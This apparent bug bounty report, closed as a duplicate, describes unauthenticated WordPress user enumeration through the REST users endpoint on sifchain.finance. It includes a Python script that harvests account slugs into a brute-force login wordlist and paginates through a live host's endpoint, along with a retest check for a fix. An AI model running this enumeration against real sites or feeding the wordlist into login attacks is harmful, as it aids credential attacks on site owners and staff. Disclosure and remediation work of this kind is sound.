Information disclosure on Sifchain
Vulnerability Details
## Summary:
Hello Team,
I have found user/admin usernames disclosed.
Using the REST API, we can see all the WordPress users/authors with some of their information (such as id, name, login name, etc.), including employees of Sifchain, without authentication on https://sifchain.finance/
## Steps To Reproduce:
You can find the information disclosure by going to the following URL: https://sifchain.finance/wp-json/wp/v2/users/
## Supporting Material/References:
1) https://hackerone.com/reports/753725
2) https://hackerone.com/reports/138244
## Impact
1) Malicious users could collect the disclosed usernames and focus a brute-force (BF) attack on them (as the usernames are now known), making it easier to penetrate the systems.
2) Therefore this information can be used for brute-force login attempts.
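To make the check reproducible, here is an added example (not part of the original report, and not code from Sifchain) that parses the JSON the WordPress users endpoint returns, pulls out the fields a brute-force wordlist would use, and walks the endpoint's pagination when run against a live host. The sample response bodies are constructed for this example; `example.invalid` is a placeholder host, and the assumption that `slug` equals the login name holds for default WordPress installs (the nicename is derived from the login) but can differ if an admin changed it. Unauthenticated, WordPress only lists users who have published public posts, which is why a small author list does not prove there are no other accounts.

```python
import json
import urllib.error
import urllib.request

# Constructed sample of a /wp-json/wp/v2/users/ response. The field names follow
# the public WordPress REST API user schema; the values are made up for this
# example and are not data from sifchain.finance.
SAMPLE_RESPONSE = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin",
     "link": "https://example.invalid/author/admin/"},
    {"id": 4, "name": "Jane Doe", "slug": "jdoe",
     "link": "https://example.invalid/author/jdoe/"},
    {"id": 4, "name": "Jane Doe", "slug": "jdoe",   # same user repeated, as across pages
     "link": "https://example.invalid/author/jdoe/"},
])

# Constructed sample of the error object WordPress returns once the endpoint is
# restricted to authenticated users, i.e. what a fix should produce.
LOCKED_RESPONSE = json.dumps({
    "code": "rest_user_cannot_view",
    "message": "Sorry, you are not allowed to list users.",
    "data": {"status": 401},
})


def extract_accounts(body):
    """Parse one page of the users endpoint into (id, slug, display name) tuples.

    `slug` is the user's nicename, which WordPress derives from the login name
    by default, so it is the field that feeds a brute-force wordlist. A WP error
    object (a dict rather than a list) means nothing was disclosed.
    """
    data = json.loads(body)
    if isinstance(data, dict):
        return []
    return [(u["id"], u["slug"], u.get("name", "")) for u in data if "slug" in u]


def candidate_logins(accounts):
    """Deduplicate the slugs, preserving order, for use as a login wordlist."""
    seen = set()
    logins = []
    for _, slug, _ in accounts:
        if slug not in seen:
            seen.add(slug)
            logins.append(slug)
    return logins


def is_disclosing(body):
    """True when an unauthenticated response leaks at least one account."""
    return len(extract_accounts(body)) > 0


def fetch_users(base_url, per_page=100, timeout=10):
    """Walk every page of /wp-json/wp/v2/users/ without credentials.

    Network call for live testing only; the offline example never runs it.
    WordPress reports the page count in the X-WP-TotalPages response header.
    """
    accounts = []
    page = 1
    while True:
        url = f"{base_url.rstrip('/')}/wp-json/wp/v2/users/?per_page={per_page}&page={page}"
        req = urllib.request.Request(url, headers={"User-Agent": "wp-user-enum-check/1.0"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
                total_pages = int(resp.headers.get("X-WP-TotalPages", "1"))
        except urllib.error.HTTPError:
            # 401/403 (endpoint locked down) or 400 (ran past the last page): stop.
            break
        accounts.extend(extract_accounts(body))
        if page >= total_pages:
            break
        page += 1
    return accounts


if __name__ == "__main__":
    found = extract_accounts(SAMPLE_RESPONSE)
    print("disclosed:", is_disclosing(SAMPLE_RESPONSE))
    print("login candidates:", candidate_logins(found))
    # Against a live host: print(candidate_logins(fetch_users("https://example.invalid")))
```

Running `is_disclosing` against the live endpoint before and after a fix gives a pass/fail check for the retest: the endpoint is remediated when unauthenticated requests receive the `rest_user_cannot_view` error object instead of a list.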
- Report ID: 1188998
- State: Closed
- Substate: duplicate
- Upvotes: 1